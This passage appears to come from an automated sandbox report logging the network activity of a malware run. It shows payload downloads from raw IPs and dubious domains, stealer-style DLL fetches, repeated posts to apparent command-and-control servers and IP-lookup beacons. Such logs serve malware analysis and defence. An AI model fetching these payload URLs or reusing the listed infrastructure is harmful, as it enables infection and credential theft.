                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                Host: 185.215.113.64:8765
                                                                Content-Length: 137
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Content-Length: 4724
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 28 Jun 2021 16:08:03 GMT
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 202
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:08:07 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 169
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:09 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 133
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:11 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 201
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:14 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                api.ip.sb
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                api.ip.sb
                                                                IN A
                                                                Response
                                                                api.ip.sb
                                                                IN CNAME
                                                                api.ip.sb.cdn.cloudflare.net
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                172.67.75.172
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.12.31
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.13.31
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 223
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:17 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 265
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:20 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 273
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:23 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • 104.21.12.59:80
                                                                http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                http
                                                                setup_install.exe
                                                                473 B
                                                                814 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                GET http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7

                                                                HTTP Response

                                                                200
                                                              • 208.95.112.1:80
                                                                http://ip-api.com/json/
                                                                http
                                                                arnatic_4.exe
                                                                774 B
                                                                672 B
                                                                6
                                                                4

                                                                HTTP Request

                                                                GET http://ip-api.com/json/

                                                                HTTP Response

                                                                200
                                                              • 172.67.201.250:443
                                                                videoconvert-download38.xyz
                                                                tls
                                                                11.6kB
                                                                603.9kB
                                                                233
                                                                428
                                                              • 31.13.83.36:443
                                                                www.facebook.com
                                                                tls
                                                                11.5kB
                                                                540.2kB
                                                                216
                                                                395
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                827 B
                                                                7.2kB
                                                                10
                                                                10
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                568 B
                                                                1.4kB
                                                                6
                                                                5
                                                              • 136.144.41.133:80
                                                                http://136.144.41.133/server.txt
                                                                http
                                                                479 B
                                                                515 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                GET http://136.144.41.133/server.txt

                                                                HTTP Response

                                                                200
                                                              • 34.117.59.81:443
                                                                ipinfo.io
                                                                tls
                                                                968 B
                                                                7.7kB
                                                                10
                                                                11
                                                              • 216.239.32.29:80
                                                                http://pki.goog/gsr1/gsr1.crt
                                                                http
                                                                357 B
                                                                3.0kB
                                                                5
                                                                4

                                                                HTTP Request

                                                                GET http://pki.goog/gsr1/gsr1.crt

                                                                HTTP Response

                                                                200
                                                              • 127.0.0.1:62764
                                                                setup_install.exe
                                                              • 127.0.0.1:62766
                                                                setup_install.exe
                                                              • 74.114.154.22:443
                                                                sergeevih43.tumblr.com
                                                                tls
                                                                1.2kB
                                                                20.6kB
                                                                16
                                                                19
                                                              • 136.144.41.152:80
                                                                http://136.144.41.152/base/api/getData.php
                                                                http
                                                                1.2kB
                                                                2.5kB
                                                                9
                                                                8

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200
                                                              • 45.133.245.228:80
                                                                http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
                                                                http
                                                                7.2kB
                                                                379.6kB
                                                                146
                                                                260

                                                                HTTP Request

                                                                HEAD http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe

                                                                HTTP Response

                                                                200
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                399 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                399 B
                                                                528 B
                                                                5
                                                                5
                                                              • 172.67.158.82:80
                                                                jom.diregame.live
                                                                tls
                                                                398 B
                                                                528 B
                                                                5
                                                                5
                                                              • 136.144.41.133:80
                                                                http://136.144.41.133/WW/file1.exe
                                                                http
                                                                33.5kB
                                                                1.5MB
                                                                644
                                                                1004

                                                                HTTP Request

                                                                HEAD http://136.144.41.133/WW/file7.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                HEAD http://136.144.41.133/WW/file1.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://136.144.41.133/WW/file2.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://136.144.41.133/WW/file1.exe

                                                                HTTP Response

                                                                200
                                                              • 136.144.41.133:80
                                                                http://136.144.41.133/WW/file8.exe
                                                                http
                                                                29.7kB
                                                                1.2MB
                                                                565
                                                                827

                                                                HTTP Request

                                                                HEAD http://136.144.41.133/WW/file2.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                HEAD http://136.144.41.133/WW/file8.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://136.144.41.133/WW/file7.exe

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://136.144.41.133/WW/file8.exe
                                                              • 185.20.227.194:80
                                                                152 B
                                                                3
                                                              • 172.67.158.82:80
                                                                jom.diregame.live
                                                                tls
                                                                360 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                399 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                361 B
                                                                528 B
                                                                5
                                                                5
                                                              • 89.221.213.3:80
                                                                www.quickfastfuriousloaded.com
                                                                152 B
                                                                3
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                361 B
                                                                528 B
                                                                5
                                                                5
                                                              • 172.67.158.82:80
                                                                jom.diregame.live
                                                                tls
                                                                288 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                288 B
                                                                528 B
                                                                5
                                                                5
                                                              • 172.67.158.82:80
                                                                jom.diregame.live
                                                                190 B
                                                                92 B
                                                                4
                                                                2
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                361 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                288 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                190 B
                                                                92 B
                                                                4
                                                                2
                                                              • 172.67.158.82:443
                                                                jom.diregame.live
                                                                tls
                                                                960 B
                                                                5.2kB
                                                                9
                                                                10
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                tls
                                                                288 B
                                                                528 B
                                                                5
                                                                5
                                                              • 162.159.129.233:443
                                                                cdn.discordapp.com
                                                                tls
                                                                17.3kB
                                                                1.0MB
                                                                364
                                                                705
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                190 B
                                                                92 B
                                                                4
                                                                2
                                                              • 162.159.129.233:80
                                                                cdn.discordapp.com
                                                                190 B
                                                                92 B
                                                                4
                                                                2
                                                              • 162.159.129.233:443
                                                                cdn.discordapp.com
                                                                tls
                                                                78.0kB
                                                                4.9MB
                                                                1684
                                                                3277
                                                              • 104.21.46.30:443
                                                                pcfixmy-download-13.xyz
                                                                tls
                                                                39.4kB
                                                                2.2MB
                                                                756
                                                                1494
                                                              • 162.159.129.233:443
                                                                cdn.discordapp.com
                                                                tls
                                                                41.8kB
                                                                2.5MB
                                                                897
                                                                1716
                                                              • 172.67.186.79:443
                                                                d.dirdgame.live
                                                                tls
                                                                13.1kB
                                                                726.6kB
                                                                273
                                                                501
                                                              • 136.144.41.133:80
                                                                http://136.144.41.133/WW/file8.exe
                                                                http
                                                                37.6kB
                                                                1.9MB
                                                                781
                                                                1282

                                                                HTTP Request

                                                                GET http://136.144.41.133/WW/file8.exe

                                                                HTTP Response

                                                                200
                                                              • 157.90.127.76:80
                                                                http://157.90.127.76/
                                                                http
                                                                46.7kB
                                                                2.5MB
                                                                873
                                                                1654

                                                                HTTP Request

                                                                POST http://157.90.127.76/706

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/freebl3.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/mozglue.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/msvcp140.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/nss3.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/softokn3.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://157.90.127.76/vcruntime140.dll

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://157.90.127.76/

                                                                HTTP Response

                                                                200
                                                              • 104.21.51.159:443
                                                                iphonemoney.xyz
                                                                tls
                                                                39.0kB
                                                                2.2MB
                                                                744
                                                                1475
                                                              • 208.95.112.1:80
                                                                http://ip-api.com/json/
                                                                http
                                                                774 B
                                                                672 B
                                                                6
                                                                4

                                                                HTTP Request

                                                                GET http://ip-api.com/json/

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 185.20.227.194:80
                                                                152 B
                                                                3
                                                              • 89.221.213.3:80
                                                                www.quickfastfuriousloaded.com
                                                                152 B
                                                                3
                                                              • 208.95.112.1:80
                                                                http://ip-api.com/json/?fields=8198
                                                                http
                                                                1.6kB
                                                                1.2kB
                                                                10
                                                                6

                                                                HTTP Request

                                                                GET http://ip-api.com/json/?fields=8198

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://ip-api.com/json/?fields=8198

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://ip-api.com/json/?fields=8198

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                GET http://ip-api.com/json/?fields=8198

                                                                HTTP Response

                                                                200
                                                              • 172.67.200.215:80
                                                                http://iw.gamegame.info/report7.4.php
                                                                http
                                                                2.2kB
                                                                2.8kB
                                                                10
                                                                11

                                                                HTTP Request

                                                                POST http://iw.gamegame.info/report7.4.php

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://iw.gamegame.info/report7.4.php

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://iw.gamegame.info/report7.4.php

                                                                HTTP Response

                                                                200
                                                              • 185.20.227.194:80
                                                                152 B
                                                                3
                                                              • 31.13.83.36:443
                                                                www.facebook.com
                                                                tls
                                                                11.7kB
                                                                538.4kB
                                                                219
                                                                402
                                                              • 104.21.21.221:80
                                                                http://ol.gamegame.info/report7.4.php
                                                                http
                                                                870 B
                                                                964 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://ol.gamegame.info/report7.4.php

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 77.246.145.4:80
                                                                http://zedaumalev.xyz/
                                                                http
                                                                734 B
                                                                5.4kB
                                                                8
                                                                10

                                                                HTTP Request

                                                                POST http://zedaumalev.xyz/

                                                                HTTP Response

                                                                200
                                                              • 172.67.75.172:443
                                                                api.ip.sb
                                                                tls
                                                                802 B
                                                                4.1kB
                                                                10
                                                                9
                                                              • 88.218.92.148:80
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e
                                                                http
                                                                1.2kB
                                                                839 B
                                                                9
                                                                8

                                                                HTTP Request

                                                                GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e

                                                                HTTP Response

                                                                200
                                                              • 74.114.154.22:443
                                                                sergeevih43.tumblr.com
                                                                tls
                                                                1.1kB
                                                                20.6kB
                                                                15
                                                                19
                                                              • 74.114.154.22:443
                                                                sergeevih43.tumblr.com
                                                                tls
                                                                956 B
                                                                5.9kB
                                                                11
                                                                12
                                                              • 157.90.127.76:80
                                                                http://157.90.127.76/
                                                                http
                                                                4.9kB
                                                                928 B
                                                                10
                                                                8

                                                                HTTP Request

                                                                POST http://157.90.127.76/865

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://157.90.127.76/

                                                                HTTP Response

                                                                200
                                                              • 185.20.227.194:80
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 88.218.92.148:80
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb
                                                                http
                                                                1.2kB
                                                                799 B
                                                                9
                                                                7

                                                                HTTP Request

                                                                GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb

                                                                HTTP Response

                                                                200
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                1.3kB
                                                                6.4kB
                                                                11
                                                                12
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 136.144.41.152:80
                                                                http://136.144.41.152/base/api/getData.php
                                                                http
                                                                1.5kB
                                                                939 B
                                                                8
                                                                5

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://136.144.41.152/base/api/getData.php

                                                                HTTP Response

                                                                200
                                                              • 88.99.66.31:443
                                                                iplis.ru
                                                                tls
                                                                1.1kB
                                                                5.5kB
                                                                8
                                                                8
                                                              • 77.246.145.4:80
                                                                http://zedaumalev.xyz/
                                                                http
                                                                16.0kB
                                                                1.3kB
                                                                17
                                                                12

                                                                HTTP Request

                                                                POST http://zedaumalev.xyz/

                                                                HTTP Response

                                                                200

                                                                HTTP Request

                                                                POST http://zedaumalev.xyz/

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                860 B
                                                                465 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                793 B
                                                                498 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 43.132.165.55:80
                                                                http://dgos.top/dl/build.exe
                                                                http
                                                                15.5kB
                                                                931.8kB
                                                                334
                                                                645

                                                                HTTP Request

                                                                GET http://dgos.top/dl/build.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                823 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                855 B
                                                                513 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 152.89.247.174:80
                                                                http://152.89.247.174/blog/files/sefile.exe
                                                                http
                                                                7.8kB
                                                                456.2kB
                                                                166
                                                                313

                                                                HTTP Request

                                                                GET http://152.89.247.174/blog/files/sefile.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                807 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                725 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                773 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                803 B
                                                                499 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 185.215.113.62:51929
                                                                http://185.215.113.62:51929/
                                                                http
                                                                556 B
                                                                132 B
                                                                4
                                                                3

                                                                HTTP Request

                                                                POST http://185.215.113.62:51929/
                                                              • 37.120.239.108:80
                                                                http://37.120.239.108/200.exe
                                                                http
                                                                11.6kB
                                                                724.6kB
                                                                248
                                                                544

                                                                HTTP Request

                                                                GET http://37.120.239.108/200.exe

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                672 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                702 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                747 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                907 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                894 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                799 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                842 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 77.123.139.190:443
                                                                api.2ip.ua
                                                                tls
                                                                970 B
                                                                8.1kB
                                                                11
                                                                10
                                                              • 185.215.113.64:8765
                                                                http://185.215.113.64:8765/
                                                                http
                                                                647 B
                                                                5.2kB
                                                                6
                                                                7

                                                                HTTP Request

                                                                POST http://185.215.113.64:8765/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                762 B
                                                                450 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                200
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                729 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                647 B
                                                                793 B
                                                                5
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 87.251.71.195:82
                                                                152 B
                                                                3
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                761 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 172.67.75.172:443
                                                                api.ip.sb
                                                                tls
                                                                716 B
                                                                5.3kB
                                                                8
                                                                10
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                783 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                825 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 79.106.245.34:80
                                                                http://lahuertasonora.com/upload/
                                                                http
                                                                833 B
                                                                793 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                POST http://lahuertasonora.com/upload/

                                                                HTTP Response

                                                                404
                                                              • 8.8.8.8:53
                                                                motiwa.xyz
                                                                dns
                                                                setup_install.exe
                                                                56 B
                                                                88 B
                                                                1
                                                                1

                                                                DNS Request

                                                                motiwa.xyz

                                                                DNS Response

                                                                104.21.12.59
                                                                172.67.193.180

                                                              • 8.8.8.8:53
                                                                ip-api.com
                                                                dns
                                                                arnatic_4.exe
                                                                56 B
                                                                72 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ip-api.com

                                                                DNS Response

                                                                208.95.112.1

                                                              • 8.8.8.8:53
                                                                email.yg9.me
                                                                dns
                                                                SystemNetworkService
                                                                58 B
                                                                74 B
                                                                1
                                                                1

                                                                DNS Request

                                                                email.yg9.me

                                                                DNS Response

                                                                198.13.62.186

                                                              • 8.8.8.8:53
                                                                email.yg9.me
                                                                dns
                                                                SystemNetworkService
                                                                58 B
                                                                129 B
                                                                1
                                                                1

                                                                DNS Request

                                                                email.yg9.me

                                                              • 8.8.8.8:53
                                                                videoconvert-download38.xyz
                                                                dns
                                                                arnatic_5.exe
                                                                73 B
                                                                105 B
                                                                1
                                                                1

                                                                DNS Request

                                                                videoconvert-download38.xyz

                                                                DNS Response

                                                                172.67.201.250
                                                                104.21.42.63

                                                              • 198.13.62.186:53
                                                                email.yg9.me
                                                                65.6kB
                                                                764.2kB
                                                                1251
                                                                1376
                                                              • 8.8.8.8:53
                                                                www.facebook.com
                                                                dns
                                                                arnatic_4.exe
                                                                62 B
                                                                107 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.facebook.com

                                                                DNS Response

                                                                31.13.83.36

                                                              • 8.8.8.8:53
                                                                iplogger.org
                                                                dns
                                                                58 B
                                                                74 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iplogger.org

                                                                DNS Response

                                                                88.99.66.31

                                                              • 8.8.8.8:53
